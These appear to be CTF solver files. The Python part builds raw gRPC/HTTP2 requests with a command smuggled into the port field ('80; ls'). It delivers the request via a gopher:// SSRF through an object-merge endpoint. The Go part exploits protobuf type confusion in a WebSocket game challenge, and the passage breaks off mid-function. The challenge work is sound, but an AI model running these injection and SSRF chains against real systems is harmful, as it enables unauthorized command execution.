    # HTTP/2 SETTINGS frame (empty payload, stream 0)
    settings_frame = bytes.fromhex("000000040000000000")
    # HTTP/2 SETTINGS frame with ACK flag; sent up front because the whole
    # request is written in one go without reading the peer's SETTINGS.
    settings_ack = bytes.fromhex("000000040100000000")

    # HEADERS frame: 3-byte length, type 0x01, flags 0x04 (END_HEADERS), stream 1
    encoded_headers = encode_grpc_http2_headers(service_name, method_name)
    headers_length = len(encoded_headers).to_bytes(3, byteorder='big')
    headers_frame = headers_length + bytes.fromhex("010400000001") + encoded_headers

    # gRPC message framing: 1-byte compressed flag + 4-byte big-endian length
    grpc_header = bytes([0]) + len(message_data).to_bytes(4, byteorder='big')

    # DATA frame header: type 0x00, flags 0x01 (END_STREAM), stream 1
    data_length = (len(grpc_header) + len(message_data)).to_bytes(3, byteorder='big')
    data_frame_header = data_length + bytes.fromhex("000100000001")

    return b"".join((
        http2_preface,
        settings_frame,
        settings_ack,
        headers_frame,
        data_frame_header,
        grpc_header,
        message_data,
    ))
def encode_grpc_http2_headers(service_name, method_name):
    """HPACK-encode the request headers for a gRPC call to service/method."""
    request_path = f'/{service_name}/{method_name}'
    header_fields = [
        (':method', 'POST'),
        (':scheme', 'http'),
        (':path', request_path),
        ('content-type', 'application/grpc'),
    ]
    # A fresh encoder per call: every request starts with an empty dynamic table.
    return hpack.Encoder().encode(header_fields)
def decode_hpack_headers(encoded_headers):
    """
    Decompress an HPACK header block into header tuples.

    Args:
        encoded_headers: HPACK-encoded header block
    Returns:
        The decoded (name, value) headers, or an empty list when decoding
        fails (the error is printed, not raised).
    """
    import hpack

    hpack_decoder = hpack.Decoder()
    try:
        decoded = hpack_decoder.decode(encoded_headers)
    except Exception as e:
        print(f"Error decoding headers: {e}")
        return []
    return decoded
def get_http2_frame_type_name(type_id):
    """Translate a numeric HTTP/2 frame type into its name ("UNKNOWN" if unmapped)."""
    # Names are listed in frame-type order, so the index is the type id.
    ordered_names = (
        "DATA",
        "HEADERS",
        "PRIORITY",
        "RST_STREAM",
        "SETTINGS",
        "PUSH_PROMISE",
        "PING",
        "GOAWAY",
        "WINDOW_UPDATE",
        "CONTINUATION",
    )
    name_by_id = dict(enumerate(ordered_names))
    return name_by_id.get(type_id, "UNKNOWN")
def parse_grpc_response(raw_response, verbose=False, color=True):
    """
    Comprehensive decoder that attempts to decode all components of a gRPC response
    with configurable verbosity and color options.

    The input is walked frame by frame (9-byte HTTP/2 frame header followed by
    the payload). DATA frames are handed to decode_grpc_data_frame_payload,
    HEADERS/CONTINUATION fragments are accumulated per stream and HPACK-decoded
    once END_HEADERS is seen, and GOAWAY/RST_STREAM are only reported in
    verbose mode.

    Args:
        raw_response: Raw HTTP/2 response bytes (must start at a frame header)
        verbose: If True, print detailed analysis information
        color: If True, use colors in output

    Returns:
        Dictionary with decoded information: 'frames' (one dict per frame),
        'headers' and 'trailers' (stream id -> header list), 'messages'
        (parsed protobuf messages), 'errors' (list of strings) and, when a
        trailer carries grpc-status / grpc-message, 'grpc_status'.
    """
    import hpack

    # Color settings
    C_FRAME = Fore.BLUE if color else ""
    C_HEADER = Fore.GREEN if color else ""
    C_DATA = Fore.CYAN if color else ""
    C_ERROR = Fore.RED if color else ""
    C_SUCCESS = Fore.GREEN if color else ""
    C_RESET = Style.RESET_ALL if color else ""

    if verbose:
        print(f"Response length: {len(raw_response)}")

    result = {
        'frames': [],
        'headers': {},
        'trailers': {},
        'messages': [],
        'errors': []
    }

    # HPACK's dynamic table is connection state, so one decoder must see every
    # header block in order; a fresh decoder per block can mis-decode trailers.
    hpack_decoder = hpack.Decoder()
    current_stream_id = None
    header_blocks = {}  # Map stream_id -> accumulated header block
    is_trailer = {}  # Map stream_id -> boolean (if this is a trailer block)

    def finish_header_block(stream_id, frame_info, label):
        """Decode the complete header block of stream_id and store the result."""
        block = bytes(header_blocks.pop(stream_id))
        try:
            headers = hpack_decoder.decode(block)
        except Exception as e:
            # Best effort: report the failure and carry on with the next frame
            print(f"Error decoding headers: {e}")
            result['errors'].append(f"Error decoding headers: {e}")
            headers = []
        frame_info['decoded_headers'] = headers
        if not headers:
            if verbose:
                print(f" {C_ERROR}Failed to decode {label}{C_RESET}")
            return
        if verbose:
            print(f" {C_HEADER}Decoded {label}:{C_RESET}")
            for name, value in headers:
                print(f" {C_HEADER}{name}:{C_RESET} {value}")
        # Store in appropriate place depending on if this is a trailer
        bucket = 'trailers' if is_trailer.get(stream_id) else 'headers'
        result[bucket][stream_id] = headers

    # Process HTTP/2 frames
    pos = 0
    total = len(raw_response)
    while pos < total:
        # Ensure we have enough bytes for a frame header
        if pos + 9 > total:
            error_msg = f"Incomplete frame header at position {pos}"
            result['errors'].append(error_msg)
            if verbose:
                print(f"{C_ERROR}{error_msg}{C_RESET}")
            break

        # Parse frame header: 24-bit length, type, flags, 31-bit stream id
        length = int.from_bytes(raw_response[pos:pos+3], byteorder='big')
        frame_type = raw_response[pos+3]
        flags = raw_response[pos+4]
        stream_id = int.from_bytes(raw_response[pos+5:pos+9], byteorder='big') & 0x7FFFFFFF
        end_headers = (flags & 0x04) != 0  # END_HEADERS flag
        end_stream = (flags & 0x01) != 0  # END_STREAM flag
        type_name = get_http2_frame_type_name(frame_type)
        frame_info = {
            'position': pos,
            'length': length,
            'type': frame_type,
            'type_name': type_name,
            'flags': flags,
            'stream_id': stream_id,
            'end_headers': end_headers,
            'end_stream': end_stream
        }
        if verbose:
            print(f"\n{C_FRAME}Frame at position {pos}:{C_RESET}")
            print(f" {C_FRAME}Type:{C_RESET} {type_name} ({frame_type})")
            print(f" {C_FRAME}Length:{C_RESET} {length}")
            print(f" {C_FRAME}Flags:{C_RESET} {flags:08b} (END_HEADERS: {end_headers}, END_STREAM: {end_stream})")
            print(f" {C_FRAME}Stream ID:{C_RESET} {stream_id}")
        pos += 9  # Move past frame header

        # Process frame payload
        if pos + length > total:
            error_msg = f"Incomplete frame payload (need {length} bytes, have {total - pos})"
            frame_info['error'] = error_msg
            result['errors'].append(error_msg)
            result['frames'].append(frame_info)
            if verbose:
                print(f" {C_ERROR}{error_msg}{C_RESET}")
            break
        frame_payload = raw_response[pos:pos+length]

        # Handle different frame types
        if frame_type == 0:  # DATA frame
            if verbose:
                print(f" {C_DATA}DATA frame payload:{C_RESET}")
            # Use the dedicated decoder
            message_result = decode_grpc_data_frame_payload(
                frame_payload,
                message_types=[HealthCheckResponse],  # Add more message types as needed
                verbose=verbose,
                color=color
            )
            # Add decoded info to frame_info
            frame_info['grpc_message'] = message_result
            # If we successfully parsed a message, add it to results
            if message_result['valid'] and 'parsed' in message_result:
                result['messages'].append(message_result['parsed'])
        elif frame_type == 1:  # HEADERS frame
            if verbose:
                print(f" {C_HEADER}HEADERS frame payload:{C_RESET}")
            # Start collecting header block for this stream
            if stream_id not in header_blocks:
                header_blocks[stream_id] = bytearray()
                is_trailer[stream_id] = end_stream  # Headers at the end of stream are trailers
            header_blocks[stream_id].extend(frame_payload)
            if end_headers:
                finish_header_block(stream_id, frame_info, "headers")
            else:
                current_stream_id = stream_id  # Remember for CONTINUATION frames
        elif frame_type == 9 and stream_id == current_stream_id:  # CONTINUATION frame
            if verbose:
                print(f" {C_HEADER}CONTINUATION frame payload{C_RESET}")
            if stream_id in header_blocks:
                header_blocks[stream_id].extend(frame_payload)
                if end_headers:
                    # Decode the whole accumulated block, not just this fragment
                    finish_header_block(stream_id, frame_info, "continuation headers")
                    current_stream_id = None
        # Process error frames (GOAWAY, RST_STREAM) only in verbose mode
        elif verbose:
            if frame_type == 7:  # GOAWAY frame
                if len(frame_payload) >= 8:
                    last_stream_id = int.from_bytes(frame_payload[0:4], byteorder='big') & 0x7FFFFFFF
                    error_code = int.from_bytes(frame_payload[4:8], byteorder='big')
                    print(f" {C_ERROR}GOAWAY:{C_RESET} Last Stream ID={last_stream_id}, Error={get_http2_error_name(error_code)}")
            elif frame_type == 3:  # RST_STREAM frame
                if len(frame_payload) == 4:
                    error_code = int.from_bytes(frame_payload, byteorder='big')
                    print(f" {C_ERROR}RST_STREAM:{C_RESET} Error={get_http2_error_name(error_code)}")
            else:
                # Always label the line; long payloads are cut to 30 hex chars
                payload_hex = frame_payload.hex()
                if len(frame_payload) > 30:
                    payload_hex = payload_hex[:30] + "..."
                print(f" Payload: {payload_hex}")

        result['frames'].append(frame_info)
        pos += length  # Move to next frame

    # Extract gRPC status from trailers
    for trailers in result['trailers'].values():
        for name, value in trailers:
            if name == 'grpc-status':
                try:
                    status_code = int(value)
                except (TypeError, ValueError):
                    error_msg = f"Invalid grpc-status value: {value!r}"
                    result['errors'].append(error_msg)
                    if verbose:
                        print(f"{C_ERROR}{error_msg}{C_RESET}")
                    continue
                status_name = get_grpc_status_name(status_code)
                # update() rather than assignment so an earlier grpc-message survives
                result.setdefault('grpc_status', {}).update({
                    'code': status_code,
                    'name': status_name
                })
                if verbose:
                    status_color = C_SUCCESS if status_code == 0 else C_ERROR
                    print(f"\n{status_color}gRPC Status: {status_code} ({status_name}){C_RESET}")
            if name == 'grpc-message':
                result.setdefault('grpc_status', {})['message'] = value
                if verbose:
                    print(f"{C_ERROR}gRPC Message: {value}{C_RESET}")

    # Final summary only in verbose mode
    if verbose:
        print(f"\n{C_FRAME}=== SUMMARY ==={C_RESET}")
        print(f"Total frames: {len(result['frames'])}")
        print(f"Headers: {len(result['headers'])} streams")
        print(f"Trailers: {len(result['trailers'])} streams")
        print(f"Decoded messages: {len(result['messages'])}")
        print(f"Errors: {len(result['errors'])}")

    # For cleaner non-verbose output, just print the first message if found
    if result['messages'] and not verbose:
        msg = result['messages'][0]
        # Each entry has the keys 'type', 'message' and 'text'
        print(f"{C_SUCCESS}Decoded {msg['type']}:{C_RESET} {msg['text']}")

    return result
# Error codes 0..13 in numeric order
_HTTP2_ERROR_NAMES = dict(enumerate((
    "NO_ERROR",
    "PROTOCOL_ERROR",
    "INTERNAL_ERROR",
    "FLOW_CONTROL_ERROR",
    "SETTINGS_TIMEOUT",
    "STREAM_CLOSED",
    "FRAME_SIZE_ERROR",
    "REFUSED_STREAM",
    "CANCEL",
    "COMPRESSION_ERROR",
    "CONNECT_ERROR",
    "ENHANCE_YOUR_CALM",
    "INADEQUATE_SECURITY",
    "HTTP_1_1_REQUIRED",
)))


def get_http2_error_name(code):
    """Map an HTTP/2 error code to its name, or UNKNOWN_ERROR_<code> if unlisted."""
    try:
        return _HTTP2_ERROR_NAMES[code]
    except KeyError:
        return f"UNKNOWN_ERROR_{code}"
# Status codes 0..16 in numeric order
_GRPC_STATUS_NAMES = dict(enumerate((
    "OK",
    "CANCELLED",
    "UNKNOWN",
    "INVALID_ARGUMENT",
    "DEADLINE_EXCEEDED",
    "NOT_FOUND",
    "ALREADY_EXISTS",
    "PERMISSION_DENIED",
    "RESOURCE_EXHAUSTED",
    "FAILED_PRECONDITION",
    "ABORTED",
    "OUT_OF_RANGE",
    "UNIMPLEMENTED",
    "INTERNAL",
    "UNAVAILABLE",
    "DATA_LOSS",
    "UNAUTHENTICATED",
)))


def get_grpc_status_name(code):
    """Map a gRPC status code to its name, or UNKNOWN_STATUS_<code> if unlisted."""
    try:
        return _GRPC_STATUS_NAMES[code]
    except KeyError:
        return f"UNKNOWN_STATUS_{code}"
def parse_grpc_request(raw_request, verbose=False, color=True):
    """
    Decodes a raw gRPC HTTP/2 request and extracts relevant information.

    The optional HTTP/2 connection preface is recognised first; the rest of
    the input is walked frame by frame. DATA frames are handed to
    decode_grpc_data_frame_payload (without message types, since the request
    type is not known here), HEADERS/CONTINUATION fragments are accumulated
    per stream and HPACK-decoded once END_HEADERS is seen, and SETTINGS
    parameters are parsed into the frame record.

    Args:
        raw_request: Raw HTTP/2 request bytes
        verbose: If True, print detailed analysis information
        color: If True, use colors in output

    Returns:
        Dictionary with decoded information: 'preface', 'frames', 'headers'
        (stream id -> header list), 'messages' (raw gRPC messages), 'errors',
        plus 'service' and 'method' when a :path of the form
        /<service>/<method> was decoded.
    """
    import hpack

    # Color settings
    C_FRAME = Fore.BLUE if color else ""
    C_HEADER = Fore.GREEN if color else ""
    C_DATA = Fore.CYAN if color else ""
    C_ERROR = Fore.RED if color else ""
    C_SUCCESS = Fore.GREEN if color else ""
    C_RESET = Style.RESET_ALL if color else ""

    if verbose:
        print(f"Request length: {len(raw_request)}")

    result = {
        'preface': None,
        'frames': [],
        'headers': {},
        'messages': [],
        'errors': []
    }

    # Look for HTTP/2 connection preface ("PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n")
    http2_preface = bytes.fromhex("505249202a20485454502f322e300d0a0d0a534d0d0a0d0a")
    pos = 0
    if raw_request.startswith(http2_preface):
        result['preface'] = {
            'position': 0,
            'length': len(http2_preface),
            'valid': True
        }
        if verbose:
            print(f"{C_SUCCESS}Found valid HTTP/2 connection preface{C_RESET}")
        pos = len(http2_preface)
    else:
        # Without a preface, frames are assumed to start at offset 0
        result['preface'] = {
            'position': 0,
            'valid': False
        }
        if verbose:
            print(f"{C_ERROR}HTTP/2 connection preface not found{C_RESET}")

    # HPACK's dynamic table is connection state, so one decoder must see every
    # header block in order.
    hpack_decoder = hpack.Decoder()
    current_stream_id = None
    header_blocks = {}  # Map stream_id -> accumulated header block

    def finish_header_block(stream_id, frame_info, label):
        """Decode the complete header block of stream_id and store the result."""
        block = bytes(header_blocks.pop(stream_id))
        try:
            headers = hpack_decoder.decode(block)
        except Exception as e:
            # Best effort: report the failure and carry on with the next frame
            print(f"Error decoding headers: {e}")
            result['errors'].append(f"Error decoding headers: {e}")
            headers = []
        frame_info['decoded_headers'] = headers
        if not headers:
            if verbose:
                print(f" {C_ERROR}Failed to decode {label}{C_RESET}")
            return
        if verbose:
            print(f" {C_HEADER}Decoded {label}:{C_RESET}")
            for name, value in headers:
                print(f" {C_HEADER}{name}:{C_RESET} {value}")
        result['headers'][stream_id] = headers
        # Extract service and method from headers if present
        path = next((value for name, value in headers if name == ':path'), None)
        if path and path.startswith('/'):
            parts = path[1:].split('/')
            if len(parts) >= 2:
                result['service'] = parts[0]
                result['method'] = parts[1]
                if verbose:
                    print(f" {C_SUCCESS}Identified service:{C_RESET} {parts[0]}")
                    print(f" {C_SUCCESS}Identified method:{C_RESET} {parts[1]}")

    # Process HTTP/2 frames
    total = len(raw_request)
    while pos < total:
        # Ensure we have enough bytes for a frame header
        if pos + 9 > total:
            error_msg = f"Incomplete frame header at position {pos}"
            result['errors'].append(error_msg)
            if verbose:
                print(f"{C_ERROR}{error_msg}{C_RESET}")
            break

        # Parse frame header: 24-bit length, type, flags, 31-bit stream id
        length = int.from_bytes(raw_request[pos:pos+3], byteorder='big')
        frame_type = raw_request[pos+3]
        flags = raw_request[pos+4]
        stream_id = int.from_bytes(raw_request[pos+5:pos+9], byteorder='big') & 0x7FFFFFFF
        end_headers = (flags & 0x04) != 0  # END_HEADERS flag
        end_stream = (flags & 0x01) != 0  # END_STREAM flag
        type_name = get_http2_frame_type_name(frame_type)
        frame_info = {
            'position': pos,
            'length': length,
            'type': frame_type,
            'type_name': type_name,
            'flags': flags,
            'stream_id': stream_id,
            'end_headers': end_headers,
            'end_stream': end_stream
        }
        if verbose:
            print(f"\n{C_FRAME}Frame at position {pos}:{C_RESET}")
            print(f" {C_FRAME}Type:{C_RESET} {type_name} ({frame_type})")
            print(f" {C_FRAME}Length:{C_RESET} {length}")
            print(f" {C_FRAME}Flags:{C_RESET} {flags:08b} (END_HEADERS: {end_headers}, END_STREAM: {end_stream})")
            print(f" {C_FRAME}Stream ID:{C_RESET} {stream_id}")
        pos += 9  # Move past frame header

        # Process frame payload
        if pos + length > total:
            error_msg = f"Incomplete frame payload (need {length} bytes, have {total - pos})"
            frame_info['error'] = error_msg
            result['errors'].append(error_msg)
            result['frames'].append(frame_info)
            if verbose:
                print(f" {C_ERROR}{error_msg}{C_RESET}")
            break
        frame_payload = raw_request[pos:pos+length]

        # Handle different frame types
        if frame_type == 0:  # DATA frame
            if verbose:
                print(f" {C_DATA}DATA frame payload:{C_RESET}")
            # Use the dedicated decoder (without message types since we don't know the request type)
            message_result = decode_grpc_data_frame_payload(
                frame_payload,
                verbose=verbose,
                color=color
            )
            # Add decoded info to frame_info
            frame_info['grpc_message'] = message_result
            # For request, store the raw message data for further analysis.
            # A truncated message has no 'message_data', so check for it too.
            if message_result['valid'] and 'message_data' in message_result:
                result['messages'].append({
                    'length': message_result['message_length'],
                    'compressed': message_result['compressed'],
                    'raw_data': message_result['message_data'],
                    'hex_data': message_result['hex_data']
                })
        elif frame_type == 1:  # HEADERS frame
            if verbose:
                print(f" {C_HEADER}HEADERS frame payload:{C_RESET}")
            # Start collecting header block for this stream
            if stream_id not in header_blocks:
                header_blocks[stream_id] = bytearray()
            header_blocks[stream_id].extend(frame_payload)
            if end_headers:
                finish_header_block(stream_id, frame_info, "headers")
            else:
                current_stream_id = stream_id  # Remember for CONTINUATION frames
        elif frame_type == 9 and stream_id == current_stream_id:  # CONTINUATION frame
            if verbose:
                print(f" {C_HEADER}CONTINUATION frame payload{C_RESET}")
            if stream_id in header_blocks:
                header_blocks[stream_id].extend(frame_payload)
                if end_headers:
                    # Stored regardless of verbosity, same as the HEADERS path
                    finish_header_block(stream_id, frame_info, "continuation headers")
                    current_stream_id = None
        elif frame_type == 4:  # SETTINGS frame
            # Parse settings parameters (pairs of 16-bit identifiers and 32-bit values)
            if verbose:
                print(f" {C_FRAME}SETTINGS frame{C_RESET}")
            settings = []
            for i in range(0, len(frame_payload) - 5, 6):
                identifier = int.from_bytes(frame_payload[i:i+2], byteorder='big')
                value = int.from_bytes(frame_payload[i+2:i+6], byteorder='big')
                setting_name = get_http2_setting_name(identifier)
                settings.append((identifier, setting_name, value))
                if verbose:
                    print(f" {C_FRAME}Setting:{C_RESET} {setting_name} ({identifier}) = {value}")
            frame_info['settings'] = settings
        elif verbose:
            # Always label the line; long payloads are cut to 30 hex chars
            payload_hex = frame_payload.hex()
            if len(frame_payload) > 30:
                payload_hex = payload_hex[:30] + "..."
            print(f" Payload: {payload_hex}")

        result['frames'].append(frame_info)
        pos += length  # Move to next frame

    have_target = 'service' in result and 'method' in result

    # Final summary only in verbose mode
    if verbose:
        print(f"\n{C_FRAME}=== SUMMARY ==={C_RESET}")
        print(f"Total frames: {len(result['frames'])}")
        print(f"Headers: {len(result['headers'])} streams")
        print(f"Messages: {len(result['messages'])}")
        print(f"Errors: {len(result['errors'])}")
        if have_target:
            print(f"Service: {result['service']}")
            print(f"Method: {result['method']}")
    else:
        # For cleaner non-verbose output, just print basic info
        if have_target:
            print(f"{C_SUCCESS}Request for {result['service']}/{result['method']}{C_RESET}")
        print(f"Frames: {len(result['frames'])}, Messages: {len(result['messages'])}")

    return result
# Setting identifiers (0x7 is not listed)
_HTTP2_SETTING_NAMES = {
    1: "HEADER_TABLE_SIZE",
    2: "ENABLE_PUSH",
    3: "MAX_CONCURRENT_STREAMS",
    4: "INITIAL_WINDOW_SIZE",
    5: "MAX_FRAME_SIZE",
    6: "MAX_HEADER_LIST_SIZE",
    8: "ENABLE_CONNECT_PROTOCOL",
}


def get_http2_setting_name(identifier):
    """Map an HTTP/2 setting identifier to its name, or UNKNOWN_<id> if unlisted."""
    try:
        return _HTTP2_SETTING_NAMES[identifier]
    except KeyError:
        return f"UNKNOWN_{identifier}"
def decode_grpc_data_frame_payload(frame_payload, message_types=None, verbose=False, color=True):
    """
    Decodes a gRPC data frame payload that contains a message with length prefixing.

    The payload is expected to start with the 5-byte gRPC prefix: one byte
    compressed flag followed by a 4-byte big-endian message length. Only the
    first message in the payload is decoded; any bytes after it are counted in
    'remaining_bytes'.

    Args:
        frame_payload: Raw bytes of the DATA frame payload
        message_types: List of protobuf message types to try parsing with (optional)
        verbose: If True, print detailed analysis information
        color: If True, use colors in output

    Returns:
        Dictionary with decoded information about the message. 'valid' is True
        only when a complete message was extracted, in which case
        'message_data' and 'hex_data' are present. 'compressed' and
        'message_length' are present whenever the 5-byte prefix could be read.
        'error' describes why the payload was rejected (None otherwise).
        'parsed' is present when one of message_types parsed the message.
    """
    # Color settings
    C_DATA = Fore.CYAN if color else ""
    C_ERROR = Fore.RED if color else ""
    C_SUCCESS = Fore.GREEN if color else ""
    C_RESET = Style.RESET_ALL if color else ""

    result = {
        'valid': False,
        'error': None
    }

    # Check if we have enough bytes for gRPC message header (1 byte compressed flag + 4 bytes length)
    if len(frame_payload) < 5:
        result['error'] = f"Incomplete gRPC message header (need 5 bytes, have {len(frame_payload)})"
        if verbose:
            print(f" {C_ERROR}{result['error']}{C_RESET}")
        return result

    # Extract gRPC message framing
    compressed = frame_payload[0]
    message_length = int.from_bytes(frame_payload[1:5], byteorder='big')
    result.update({
        'compressed': compressed,
        'message_length': message_length,
    })
    if verbose:
        print(f" {C_DATA}gRPC message framing:{C_RESET}")
        print(f" Compressed: {compressed}")
        print(f" Message length: {message_length} bytes")

    # Check if we have the complete message. 'valid' stays False here so that
    # callers never look for 'message_data' on a truncated message.
    available = len(frame_payload) - 5
    if available < message_length:
        result['error'] = f"Incomplete message data (need {message_length} bytes, have {available})"
        if verbose:
            print(f" {C_ERROR}{result['error']}{C_RESET}")
        return result

    # Extract the message data
    message_data = frame_payload[5:5+message_length]
    hex_data = message_data.hex()
    result['valid'] = True
    result['message_data'] = message_data
    result['hex_data'] = hex_data

    if verbose:
        print(f" {C_DATA}Message data (hex):{C_RESET}")
        # Format hex data in chunks for better readability
        if len(hex_data) > 100:
            # Show at most 300 hex characters (150 bytes), 64 per line
            shown = hex_data[:300]
            formatted_hex = "\n ".join(
                shown[i:i+64] for i in range(0, len(shown), 64)
            )
            if len(hex_data) > 300:
                # Two hex characters per byte
                formatted_hex += f"\n ... ({(len(hex_data) - 300) // 2} more bytes)"
            print(f" {formatted_hex}")
        else:
            print(f" {hex_data}")

    # Try to parse with provided message types; the first that parses wins
    for msg_type in message_types or ():
        try:
            message = msg_type()
            message.ParseFromString(message_data)
            text = str(message)
        except Exception as e:
            # Best effort: a failure just means "not this type", try the next
            if verbose:
                print(f" {C_ERROR}Failed to parse as {msg_type.__name__}: {e}{C_RESET}")
            continue
        result['parsed'] = {
            'type': msg_type.__name__,
            'message': message,
            'text': text
        }
        if verbose:
            # Built outside the f-string: a backslash inside an f-string
            # expression is a syntax error before Python 3.12
            indented_text = text.replace('\n', '\n ')
            print(f" {C_SUCCESS}Parsed as {msg_type.__name__}:{C_RESET}")
            print(f" {indented_text}")
        break

    # If there's remaining data in the frame payload, note it
    remaining = available - message_length
    if remaining > 0:
        result['remaining_bytes'] = remaining
        if verbose:
            print(f" {C_DATA}Note: {remaining} bytes remaining after message{C_RESET}")

    return result


# solve.py
import asyncio
import httpx
# python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. ./challenge/live_data.proto
from challenge.live_data_pb2 import HealthCheckRequest
from pwn import *
from colorama import Fore, Style, init
import parser
# Default base URL for the HTTP client created in BaseAPI
URL = "http://localhost:1337"
init() # Initialize colorama
class BaseAPI:
    """
    Minimal async HTTP client for the two web endpoints used by the solver.

    The underlying httpx.AsyncClient holds a connection pool, so it should be
    released with ``await api.aclose()`` or by using the instance in an
    ``async with`` block.
    """

    def __init__(self, url=URL) -> None:
        # Relative request paths below are resolved against this base URL
        self.c = httpx.AsyncClient(base_url=url)

    def merge_fates(self, json_data: dict):
        """POST json_data as JSON to /merge-fates; the returned coroutine must be awaited."""
        return self.c.post("/merge-fates", json=json_data)

    def connect_realm(self):
        """GET /connect-realm; the returned coroutine must be awaited."""
        return self.c.get("/connect-realm")

    async def aclose(self) -> None:
        """Close the underlying HTTP client and its connections."""
        await self.c.aclose()

    async def __aenter__(self):
        return self

    async def __aexit__(self, exc_type, exc, tb) -> None:
        await self.aclose()
class API(BaseAPI):
    """Client used by the solver; adds nothing on top of BaseAPI."""
def quote(payload: bytes) -> str:
    """
    Percent-encode every byte of the payload.

    Unlike urllib.parse.quote, no byte is left as-is: each one becomes
    ``%xx`` with two lowercase hex digits, so arbitrary binary data can be
    embedded in a URL.

    Args:
        payload: The raw bytes to encode

    Returns:
        The encoded string, three characters per input byte
    """
    # join() builds the string in one pass instead of repeated concatenation
    return "".join(f"%{byte:02x}" for byte in payload)
async def main():
    """
    Build the raw gRPC request, try it directly, then deliver it via gopher.

    Steps:
      1. Serialize a CheckHealth request whose port field carries the
         injected command and wrap it in HTTP/2 + gRPC framing.
      2. Send it straight to the gRPC port and drop into an interactive
         session (local debugging aid).
      3. Percent-encode the same bytes into a gopher:// URL, store it as
         realm_url through /merge-fates, and call /connect-realm.
    """
    api = API()
    try:
        payload = parser.create_grpc_http2_request(
            HealthCheckRequest(ip="127.0.0.1", port="80; ls"),
            "live.LiveDataService",
            "CheckHealth"
        )
        print(payload)

        # Direct connection to the gRPC port; interactive() blocks until the
        # user leaves the session
        r = remote("localhost", 50051)
        try:
            r.send(payload)
            r.interactive()
        finally:
            # Release the socket even if the session is interrupted
            r.close()

        # "_" is the gopher item-type placeholder; everything after it is sent raw
        payload_urlencoded = quote(payload)
        gopher_payload = "gopher://localhost:50051/_"+payload_urlencoded
        print(gopher_payload)

        res = await api.merge_fates({"class": {"superclass": {"realm_url": gopher_payload}}})
        print(res.text)
        res = await api.connect_realm()
        print(res.text)
    finally:
        # Close the HTTP client's connection pool
        await api.c.aclose()
# Run the solver only when executed as a script, not when imported
if __name__ == "__main__":
    asyncio.run(main())
Protobuf Challenge from cr3 ctf 2024
This only works locally because the remote server behaves differently. Each packet we send actually carries two identifiers: one selects the handler and the other selects the message type. To create a type confusion, we can set the message type to something other than what the handler expects. For example, I use the 'RequestResource' message type to trigger the exception and bypass the validation function.
solver:
To generate the Go protocol buffer bindings:
protoc -I=. --proto_path=/ --go_out=. ./protocol.proto
package main
import (
"log"
"time"
protobuf "golang/spurdo_leveling"
"github.com/gorilla/websocket"
"google.golang.org/protobuf/proto"
)
// con connects to the game's WebSocket endpoint, sends the crafted packet
// sequence from a background goroutine, and logs server replies until the
// connection fails.
//
// Wire format used in both directions here: 4 magic bytes ("meme"), 2 type
// bytes, then a protobuf-encoded Packet.
func con() {
	spurdoWS, _, err := websocket.DefaultDialer.Dial("ws://localhost:13388/ws", nil)
	// spurdoWS, _, err := websocket.DefaultDialer.Dial("wss://spurdo-ebinling.1337.sb/ws", nil)
	if err != nil {
		log.Fatal("Error connecting to WebSocket:", err)
	}
	defer spurdoWS.Close()

	// gorilla/websocket supports only one concurrent writer, but both the
	// sender goroutine and the read loop below call sendMessage. A 1-slot
	// channel serves as the write lock.
	writeLock := make(chan struct{}, 1)

	// sendMessage frames val and writes it. packetType goes into the first
	// header byte, while messageType goes into the second header byte and the
	// embedded Packet; passing different values produces the type confusion.
	sendMessage := func(packetType protobuf.PacketId, messageType protobuf.PacketId, val []byte) {
		msg := &protobuf.Packet{
			Type:  messageType,
			Value: val,
		}
		messageBytes, err := proto.Marshal(msg)
		if err != nil {
			log.Fatal("Error marshaling message:", err)
		}
		// 0x6d 0x65 0x6d 0x65 is ASCII "meme"
		byteArray := append([]byte{0x6d, 0x65, 0x6d, 0x65}, byte(packetType&0xff), byte((messageType>>8)&0xff))
		byteArray = append(byteArray, messageBytes...)

		writeLock <- struct{}{}
		err = spurdoWS.WriteMessage(websocket.BinaryMessage, byteArray)
		<-writeLock
		if err != nil {
			log.Fatal("Error sending message:", err)
		}
	}

	// waveEndMod reports wave 1 back with every mob's health set to 0.
	waveEndMod := func(mobs []*protobuf.Wave_Mob) {
		message := &protobuf.Wave{
			Number: 1,
		}
		mobsList := []*protobuf.Wave_Mob{}
		for _, mob := range mobs {
			mobsList = append(mobsList, &protobuf.Wave_Mob{
				Damage:     mob.Damage,
				Xp:         mob.Xp,
				Health:     0,
				Invincible: mob.Invincible,
			})
		}
		message.Mobs = mobsList
		message.CurrentTime = float64(time.Now().UnixNano())
		msg, err := proto.Marshal(message)
		if err != nil {
			log.Fatal(err)
		}
		sendMessage(protobuf.PacketId_PACKET_ID_WAVE, protobuf.PacketId_PACKET_ID_WAVE, msg)
	}

	// Sender: runs the scripted packet sequence once, in order.
	go func() {
		wave, _ := proto.Marshal(&protobuf.Wave{
			Number:      0,
			Mobs:        []*protobuf.Wave_Mob{},
			CurrentTime: 0,
		})
		sendMessage(protobuf.PacketId_PACKET_ID_WAVE, protobuf.PacketId_PACKET_ID_WAVE, wave)

		levelUp, _ := proto.Marshal(&protobuf.CLevelUp{Item: 300})
		requestResource, _ := proto.Marshal(&protobuf.CRequestResource{Item: "data:,cr3{"})

		time.Sleep(3 * time.Second)
		sendMessage(protobuf.PacketId_PACKET_ID_LEVEL_UP, protobuf.PacketId_PACKET_ID_LEVEL_UP, levelUp)
		// Handler id and message type deliberately disagree here
		for i := 0; i < 6; i++ {
			sendMessage(protobuf.PacketId_PACKET_ID_INVENTORY_EQUIP, protobuf.PacketId_PACKET_ID_REQUEST_RESOURCE, requestResource)
		}
		sendMessage(protobuf.PacketId_PACKET_ID_INVENTORY, protobuf.PacketId_PACKET_ID_INVENTORY, []byte{})
		sendMessage(protobuf.PacketId_PACKET_ID_REQUEST_RESOURCE, protobuf.PacketId_PACKET_ID_REQUEST_RESOURCE, requestResource)
	}()

	// Reader: decode and log every reply; the first wave's mobs are kept and
	// replayed for every later wave.
	mobs := []*protobuf.Wave_Mob{}
	for {
		_, msg, err := spurdoWS.ReadMessage()
		if err != nil {
			log.Println("Error reading message:", err)
			return
		}
		// Slicing msg[6:] would panic on a frame shorter than the 6-byte header
		if len(msg) < 6 {
			log.Println("Error unmarshaling packet: message shorter than header:", len(msg))
			continue
		}
		packet := &protobuf.Packet{}
		err = proto.Unmarshal(msg[6:], packet)
		if err != nil {
			log.Println("Error unmarshaling packet:", err)
			continue
		}
		switch protobuf.PacketId(packet.Type) {
